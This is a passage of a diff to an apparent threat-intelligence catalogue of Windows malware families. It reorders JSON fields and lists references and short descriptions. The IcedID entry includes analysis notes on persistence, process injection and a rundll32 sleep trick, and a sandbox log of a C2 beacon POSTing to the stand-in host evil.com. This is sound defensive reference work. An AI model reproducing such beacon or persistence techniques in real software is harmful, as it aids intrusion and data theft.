- ] + ], + "synonyms": [ + "httpdr0pper" + ], + "type": [] }, "uuid": "78336551-c18e-47ac-8bef-1c0c61c0e0a9", - "value": "httpdropper", - "description": "" + "value": "httpdropper" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.http_troy", "https://www.mcafee.com/enterprise/en-us/assets/white-papers/wp-dissecting-operation-troy.pdf", "http://www.malware-reversing.com/2013/04/5-south-korea-incident-new-malware.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "339b3e7c-7a4a-4a1a-94b6-555f15a0b265", - "value": "http_troy", - "description": "" + "value": "http_troy" }, { + "description": "", "meta": { - "synonyms": [ - "houdini" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hworm", "http://researchcenter.paloaltonetworks.com/2016/10/unit42-houdinis-magic-reappearance/?adbsc=social67221546&adbid=790972447373668352&adbpl=tw&adbpr=4487645412" - ] + ], + "synonyms": [ + "houdini" + ], + "type": [] }, "uuid": "94466a80-964f-467e-b4b3-0e1375174464", - "value": "Hworm", - "description": "" + "value": "Hworm" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hyperbro", "https://securelist.com/luckymouse-hits-national-data-center/86083/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "b7f1abd3-870b-42ca-9bd1-5931126c68d5", - "value": "HyperBro", - "description": "" + "value": "HyperBro" }, { + "description": "Analysis Observations:\r\n\r\n* It sets up persistence by creating a Scheduled Task with the following characteristics:\r\n * Name: Update\r\n * Trigger: At Log on\r\n * Action: %LocalAppData%\\$Example\\\\waroupada.exe /i\r\n * Conditions: Stop if the computer ceases to be idle.\r\n* The sub-directory within %LocalAppdata%, Appears to be randomly picked from the list of directories within %ProgramFiles%. This needs more verification.\r\n* The filename remained static during analysis.\r\n* The original malware exe (ex. waroupada.exe) will spawn an instance of svchost.exe as a sub-process and then inject/execute its malicious code within it\r\n* If “/i” is not passed as an argument, it sets up persistence and waits for reboot.\r\n* If “/I” is passed as an argument (as is the case when the scheduled task is triggered at login), it skips persistence setup and actually executes; resulting in C2 communication.\r\n* Employs an interesting method for sleeping by calling the Sleep function of kernel32.dll from the shell, like so:\r\n rundll32.exe kernel32,Sleep -s\r\n* Setup a local listener to proxy traffic on 127.0.0.1:50000\r\n\r\n**[Example Log from C2 Network Communication]**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] connect\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: POST /forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11 HTTP/1.1\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Connection: close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Type: application/x-www-form-urlencoded\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Length: 196\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Host: evil.com\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: <(POSTDATA)>\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: POST data stored to: /var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: **Request URL: hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending fake file configured for extension 'php'.\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: HTTP/1.1 200 OK\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Type: text/html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Server: INetSim HTTPs Server\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Date: Mon, 19 Mar 2018 16:45:55 GMT\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Connection: Close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Length: 258\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending file: /var/lib/inetsim/http/fakefiles/sample.html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] stat: 1 **method=POST url=hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11** sent=/var/lib/inetsim/http/fakefiles/sample.html postdata=/var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2", "meta": { - "synonyms": [ - "BokBot" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid", "https://digitalguardian.com/blog/iceid-banking-trojan-targeting-banks-payment-card-providers-e-commerce-sites", @@ -7924,112 +7924,112 @@ "https://www.vkremez.com/2018/09/lets-learn-deeper-dive-into.html", "http://www.intezer.com/icedid-banking-trojan-shares-code-pony-2-0-trojan/", "https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/" - ] + ], + "synonyms": [ + "BokBot" + ], + "type": [] }, "uuid": "26f5afaf-0bd7-4741-91ab-917bdd837330", - "value": "IcedID", - "description": "Analysis Observations:\r\n\r\n* It sets up persistence by creating a Scheduled Task with the following characteristics:\r\n * Name: Update\r\n * Trigger: At Log on\r\n * Action: %LocalAppData%\\$Example\\\\waroupada.exe /i\r\n * Conditions: Stop if the computer ceases to be idle.\r\n* The sub-directory within %LocalAppdata%, Appears to be randomly picked from the list of directories within %ProgramFiles%. This needs more verification.\r\n* The filename remained static during analysis.\r\n* The original malware exe (ex. waroupada.exe) will spawn an instance of svchost.exe as a sub-process and then inject/execute its malicious code within it\r\n* If “/i” is not passed as an argument, it sets up persistence and waits for reboot.\r\n* If “/I” is passed as an argument (as is the case when the scheduled task is triggered at login), it skips persistence setup and actually executes; resulting in C2 communication.\r\n* Employs an interesting method for sleeping by calling the Sleep function of kernel32.dll from the shell, like so:\r\n rundll32.exe kernel32,Sleep -s\r\n* Setup a local listener to proxy traffic on 127.0.0.1:50000\r\n\r\n**[Example Log from C2 Network Communication]**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] connect\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: POST /forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11 HTTP/1.1\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Connection: close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Type: application/x-www-form-urlencoded\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Length: 196\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Host: evil.com\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: <(POSTDATA)>\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: POST data stored to: /var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: **Request URL: hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending fake file configured for extension 'php'.\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: HTTP/1.1 200 OK\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Type: text/html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Server: INetSim HTTPs Server\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Date: Mon, 19 Mar 2018 16:45:55 GMT\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Connection: Close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Length: 258\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending file: /var/lib/inetsim/http/fakefiles/sample.html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] stat: 1 **method=POST url=hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11** sent=/var/lib/inetsim/http/fakefiles/sample.html postdata=/var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2" + "value": "IcedID" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid_downloader", "https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/", "http://www.intezer.com/icedid-banking-trojan-shares-code-pony-2-0-trojan/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "c3be9189-f8f2-45e4-b6a3-8960fd5ffc16", - "value": "IcedID Downloader", - "description": "" + "value": "IcedID Downloader" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.icefog", "http://www.kz-cert.kz/page/502" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "48cdcbcf-38a8-4c68-a85e-42989ca28861", - "value": "Icefog", - "description": "" + "value": "Icefog" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ice_ix", "https://securelist.com/ice-ix-not-cool-at-all/29111/", "https://www.virusbulletin.com/virusbulletin/2012/08/inside-ice-ix-bot-descendent-zeus", "https://blog.trendmicro.com/trendlabs-security-intelligence/zeus-gets-another-update/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "44a1706e-f6dc-43ea-ac85-9a4f2407b9a3", - "value": "Ice IX", - "description": "" + "value": "Ice IX" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.idkey", "https://isc.sans.edu/diary/22766" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "3afecded-3461-45f9-8159-e8328e56a916", - "value": "IDKEY", - "description": "" + "value": "IDKEY" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.iisniff", "https://www.trustwave.com/Resources/SpiderLabs-Blog/The-Curious-Case-of-the-Malicious-IIS-Module/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "3b746f77-214b-44f9-9ef2-0ae6b52561d6", - "value": "IISniff", - "description": "" + "value": "IISniff" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.imecab", "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "0ea585ef-bd32-4f5b-a3fe-bb48dc0956c7", - "value": "Imecab", - "description": "" + "value": "Imecab" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.imminent_monitor_rat", "https://itsjack.cc/blog/2016/01/imminent-monitor-4-rat-analysis-a-glance/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "53021414-97ad-4102-9cff-7a0e1997f867", - "value": "Imminent Monitor RAT", - "description": "" + "value": "Imminent Monitor RAT" }, { + "description": "", "meta": { - "synonyms": [ - "Foudre" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.infy", "http://researchcenter.paloaltonetworks.com/2016/06/unit42-prince-of-persia-game-over/", @@ -8037,46 +8037,44 @@ "https://github.com/pan-unit42/iocs/blob/master/prince_of_persia/hashes.csv", "https://www.intezer.com/prince-of-persia-the-sands-of-foudre/", "https://researchcenter.paloaltonetworks.com/2017/08/unit42-prince-persia-ride-lightning-infy-returns-foudre/" - ] + ], + "synonyms": [ + "Foudre" + ], + "type": [] }, "uuid": "53616ce4-9b8e-45a0-b380-9e778cd95ae2", - "value": "Infy", - "description": "" + "value": "Infy" }, { + "description": "InnaputRAT, a RAT capable of exfiltrating files from victim machines, was distributed by threat actors using phishing and Godzilla Loader. The RAT has evolved through multiple variants dating back to 2016. Recent campaigns distributing InnaputRAT beaconed to live C2 as of March 26, 2018.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.innaput_rat", "https://asert.arbornetworks.com/innaput-actors-utilize-remote-access-trojan-since-2016-presumably-targeting-victim-files/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "dd486e92-54fe-4306-9aab-05863cb6c6e1", - "value": "InnaputRAT", - "description": "InnaputRAT, a RAT capable of exfiltrating files from victim machines, was distributed by threat actors using phishing and Godzilla Loader. The RAT has evolved through multiple variants dating back to 2016. Recent campaigns distributing InnaputRAT beaconed to live C2 as of March 26, 2018." + "value": "InnaputRAT" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.invisimole", "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "22755fda-497e-4ef0-823e-5cb6d8701420", - "value": "InvisiMole", - "description": "" + "value": "InvisiMole" }, { + "description": "2006 Gozi v1.0, Gozi CRM, CRM, Papras\r\n2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)\r\n\r\nIn September 2010, the source code of a particular Gozi CRM dll version was leaked. This led to two main branches: one became known as Gozi Prinimalka, which was merge with Pony and became Vawtrak/Neverquest.\r\n\r\nThe other branch became known as Gozi ISFB, or ISFB in short. Webinject functionality was added to this version.\r\n\r\nThere is one panel which often was used in combination with ISFB: IAP. The panel's login page comes with the title 'Login - IAP'. The body contains 'AUTHORIZATION', 'Name:', 'Password:' and a single button 'Sign in' in a minimal design. Often, the panel is directly accessible by entering the C2 IP address in a browser. But there are ISFB versions which are not directly using IAP. The bot accesses a gate, which is called the 'Dreambot' gate. See win.dreambot for further information.\r\n\r\nISFB often was protected by Rovnix. This led to a further complication in the naming scheme - many companies started to call ISFB Rovnix. Because the signatures started to look for Rovnix, other trojans protected by Rovnix (in particular ReactorBot and Rerdom) sometimes got wrongly labelled.\r\n\r\nIn April 2016 a combination of Gozi ISFB and Nymaim was detected. This breed became known as GozNym. The merge uses a shellcode-like version of Gozi ISFB, that needs Nymaim to run. The C2 communication is performed by Nymaim.\r\n\r\nSee win.gozi for additional historical information.", "meta": { - "synonyms": [ - "Gozi ISFB", - "IAP", - "Pandemyia" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.isfb", "https://www.vkremez.com/2018/08/lets-learn-in-depth-reversing-of-recent.html", @@ -8092,529 +8090,531 @@ "https://www.rsa.com/de-de/resources/pandemiya-emerges-new-malware-alternative-zeus-based", "https://www.cylance.com/en_us/blog/threat-spotlight-ursnif-infostealer-malware.html", "https://arielkoren.com/blog/2016/11/01/ursnif-malware-deep-technical-dive/" - ] + ], + "synonyms": [ + "Gozi ISFB", + "IAP", + "Pandemyia" + ], + "type": [] }, "uuid": "a171321e-4968-4ac0-8497-3250c1f0d77d", - "value": "ISFB", - "description": "2006 Gozi v1.0, Gozi CRM, CRM, Papras\r\n2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)\r\n\r\nIn September 2010, the source code of a particular Gozi CRM dll version was leaked. This led to two main branches: one became known as Gozi Prinimalka, which was merge with Pony and became Vawtrak/Neverquest.\r\n\r\nThe other branch became known as Gozi ISFB, or ISFB in short. Webinject functionality was added to this version.\r\n\r\nThere is one panel which often was used in combination with ISFB: IAP. The panel's login page comes with the title 'Login - IAP'. The body contains 'AUTHORIZATION', 'Name:', 'Password:' and a single button 'Sign in' in a minimal design. Often, the panel is directly accessible by entering the C2 IP address in a browser. But there are ISFB versions which are not directly using IAP. The bot accesses a gate, which is called the 'Dreambot' gate. See win.dreambot for further information.\r\n\r\nISFB often was protected by Rovnix. This led to a further complication in the naming scheme - many companies started to call ISFB Rovnix. Because the signatures started to look for Rovnix, other trojans protected by Rovnix (in particular ReactorBot and Rerdom) sometimes got wrongly labelled.\r\n\r\nIn April 2016 a combination of Gozi ISFB and Nymaim was detected. This breed became known as GozNym. The merge uses a shellcode-like version of Gozi ISFB, that needs Nymaim to run. The C2 communication is performed by Nymaim.\r\n\r\nSee win.gozi for additional historical information." + "value": "ISFB" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ismagent", "http://www.clearskysec.com/ismagent/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "67457708-1edd-4ef1-9ec0-1c5eb7c75fe2", - "value": "ISMAgent", - "description": "" + "value": "ISMAgent" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ismdoor", "https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon", "http://www.clearskysec.com/greenbug/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "e09d8dd6-6857-4607-a0ba-9c8d2a66083b", - "value": "ISMDoor", - "description": "" + "value": "ISMDoor" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ispy_keylogger", "https://www.zscaler.com/blogs/research/ispy-keylogger" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "8c95cb51-1044-4dcd-9cac-ad9f2e3b9070", - "value": "iSpy Keylogger", - "description": "" + "value": "iSpy Keylogger" }, { + "description": "ISR Stealer is a modified version of the Hackhound Stealer. It is written in VB and often comes in a .NET-wrapper.\r\nISR Stealer makes use of two Nirsoft tools: Mail PassView and WebBrowserPassView.\r\n\r\nIncredibly, it uses an hard-coded user agent string: HardCore Software For : Public", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.isr_stealer", "https://securingtomorrow.mcafee.com/mcafee-labs/phishing-attacks-employ-old-effective-password-stealer/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "27bab2fb-d324-42c2-9df3-669bb87c3989", - "value": "ISR Stealer", - "description": "ISR Stealer is a modified version of the Hackhound Stealer. It is written in VB and often comes in a .NET-wrapper.\r\nISR Stealer makes use of two Nirsoft tools: Mail PassView and WebBrowserPassView.\r\n\r\nIncredibly, it uses an hard-coded user agent string: HardCore Software For : Public" + "value": "ISR Stealer" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.isspace", "http://researchcenter.paloaltonetworks.com/2017/01/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "a3f41c96-a5c8-4dfe-b7fa-d9d75f97979a", - "value": "IsSpace", - "description": "" + "value": "IsSpace" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jackpos", "https://www.trustwave.com/Resources/SpiderLabs-Blog/JackPOS-%E2%80%93-The-House-Always-Wins/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "3acb37f4-5614-4932-b12f-9f1c256895f2", - "value": "JackPOS", - "description": "" + "value": "JackPOS" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jaff", "http://malware-traffic-analysis.net/2017/05/16/index.html", "https://www.proofpoint.com/us/threat-insight/post/jaff-new-ransomware-from-actors-behind-distribution-of-dridex-locky-bart", "http://blog.talosintelligence.com/2017/05/jaff-ransomware.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "2c51a717-726b-4813-9fcc-1265694b128e", - "value": "Jaff", - "description": "" + "value": "Jaff" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jager_decryptor" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "13a7a2ff-c945-4b42-a112-dcf09f9ed9c9", - "value": "Jager Decryptor", - "description": "" + "value": "Jager Decryptor" }, { + "description": "", "meta": { - "synonyms": [ - "Reconcyc" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jaku", "https://www-01.ibm.com/support/docview.wss?uid=ssg1S1010146", "https://www.forcepoint.com/sites/default/files/resources/files/report_jaku_analysis_of_botnet_campaign_en_0.pdf" - ] + ], + "synonyms": [ + "Reconcyc" + ], + "type": [] }, "uuid": "0f02ea79-5833-46e0-8458-c4a863a5a112", - "value": "Jaku", - "description": "" + "value": "Jaku" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jasus", "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "af6e89ec-0adb-4ce6-b4e6-610827e722ea", - "value": "Jasus", - "description": "" + "value": "Jasus" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jigsaw" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "910c3fd2-56e5-4f1d-8df0-2aa0b293b7d9", - "value": "Jigsaw", - "description": "" + "value": "Jigsaw" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jimmy", "https://securelist.com/jimmy-nukebot-from-neutrino-with-love/81667/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "551b568f-68fa-4483-a10c-a6452ae6289e", - "value": "Jimmy", - "description": "" + "value": "Jimmy" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.joanap", "https://www.us-cert.gov/ncas/alerts/TA18-149A", "https://www.us-cert.gov/ncas/analysis-reports/AR18-149A", "https://www.acalvio.com/lateral-movement-technique-employed-by-hidden-cobra/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "bbbef449-2fe6-4c25-a85c-69af9fa6208b", - "value": "Joanap", - "description": "" + "value": "Joanap" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.joao", "https://www.welivesecurity.com/2017/08/22/gamescom-2017-fun-blackhats/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "8201c8d2-1dab-4473-bbdf-42952b3d5fc6", - "value": "Joao", - "description": "" + "value": "Joao" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jolob", "http://pwc.blogs.com/cyber_security_updates/2014/10/scanbox-framework-whos-affected-and-whos-using-it-1.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "97f12ca8-dc84-4a8c-b4c6-8ec1d1e79631", - "value": "Jolob", - "description": "" + "value": "Jolob" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jqjsnicker", "http://marcmaiffret.com/vault7/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "2e457b93-de45-4b1d-8e1d-b8d19c2c555a", - "value": "JQJSNICKER", - "description": "" + "value": "JQJSNICKER" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jripbot", "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "e895a0d2-fe4b-4793-9440-9db2d56a97f2", - "value": "JripBot", - "description": "" + "value": "JripBot" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kagent", "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "eab42a8e-22e7-49e4-8a26-44f14b6f67bb", - "value": "KAgent", - "description": "" + "value": "KAgent" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.karagany", "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "857e61fe-ccb2-426b-ad7b-696112f48dbb", - "value": "Karagany", - "description": "" + "value": "Karagany" }, { + "description": "According to ASERT, Kardon Loader is a fully featured downloader, enabling the download and installation of other malware, eg. banking trojans/credential theft etc.This malware has been on sale by an actor under the username Yattaze, starting in late April. The actor offers the sale of the malware as a standalone build with charges for each additional rebuild, or the ability to set up a botshop in which case any customer can establish their own operation and further sell access to a new customer base.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kardonloader", "https://asert.arbornetworks.com/kardon-loader-looks-for-beta-testers/", "https://engineering.salesforce.com/kardon-loader-malware-analysis-adaaaab42bab" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "8b33ba21-9af7-4536-bd02-23dd863147e8", - "value": "Kardon Loader", - "description": "According to ASERT, Kardon Loader is a fully featured downloader, enabling the download and installation of other malware, eg. banking trojans/credential theft etc.This malware has been on sale by an actor under the username Yattaze, starting in late April. The actor offers the sale of the malware as a standalone build with charges for each additional rebuild, or the ability to set up a botshop in which case any customer can establish their own operation and further sell access to a new customer base." + "value": "Kardon Loader" }, { + "description": "According to checkpoint, Karius is a banking trojan in development, borrowing code from Ramnit, Vawtrack as well as Trickbot, currently implementing webinject attacks only.\r\n\r\nIt comes with an injector that loads an intermediate \"proxy\" component, which in turn loads the actual banker component.\r\n\r\nCommunication with the c2 are in json format and encrypted with RC4 with a hardcoded key.\r\n\r\nIn the initial version, observed in March 2018, the webinjects were hardcoded in the binary, while in subsequent versions, they were received by the c2.\r\n\r\n", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.karius", "https://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/", "https://research.checkpoint.com/banking-trojans-development/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "8a01c3be-17b7-4e5a-b0b2-6c1f5ccb82cf", - "value": "Karius", - "description": "According to checkpoint, Karius is a banking trojan in development, borrowing code from Ramnit, Vawtrack as well as Trickbot, currently implementing webinject attacks only.\r\n\r\nIt comes with an injector that loads an intermediate \"proxy\" component, which in turn loads the actual banker component.\r\n\r\nCommunication with the c2 are in json format and encrypted with RC4 with a hardcoded key.\r\n\r\nIn the initial version, observed in March 2018, the webinjects were hardcoded in the binary, while in subsequent versions, they were received by the c2.\r\n\r\n" + "value": "Karius" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kasperagent", "http://researchcenter.paloaltonetworks.com/2017/04/unit42-targeted-attacks-middle-east-using-kasperagent-micropsia/", "https://www.threatconnect.com/blog/kasperagent-malware-campaign/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "d9c14095-8885-406c-b56b-06f3a1a88c1c", - "value": "KasperAgent", - "description": "" + "value": "KasperAgent" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kazuar", "http://researchcenter.paloaltonetworks.com/2017/05/unit42-kazuar-multiplatform-espionage-backdoor-api-access/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "bab92070-3589-4b7e-bf05-4f54bfefc2ca", - "value": "Kazuar", - "description": "" + "value": "Kazuar" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kegotip" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "96bb088c-7bb7-4a07-a9d7-a3cbb45d5755", - "value": "Kegotip", - "description": "" + "value": "Kegotip" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kelihos", "https://www.crowdstrike.com/blog/inside-the-takedown-of-zombie-spider-and-the-kelihos-botnet/", "https://www.wired.com/2017/04/fbi-took-russias-spam-king-massive-botnet/", "https://www.cyberscoop.com/doj-kelihos-botnet-peter-levashov-severa/", "https://en.wikipedia.org/wiki/Kelihos_botnet" - ] + ], + "synonyms": [], + "type": [] }, "uuid": 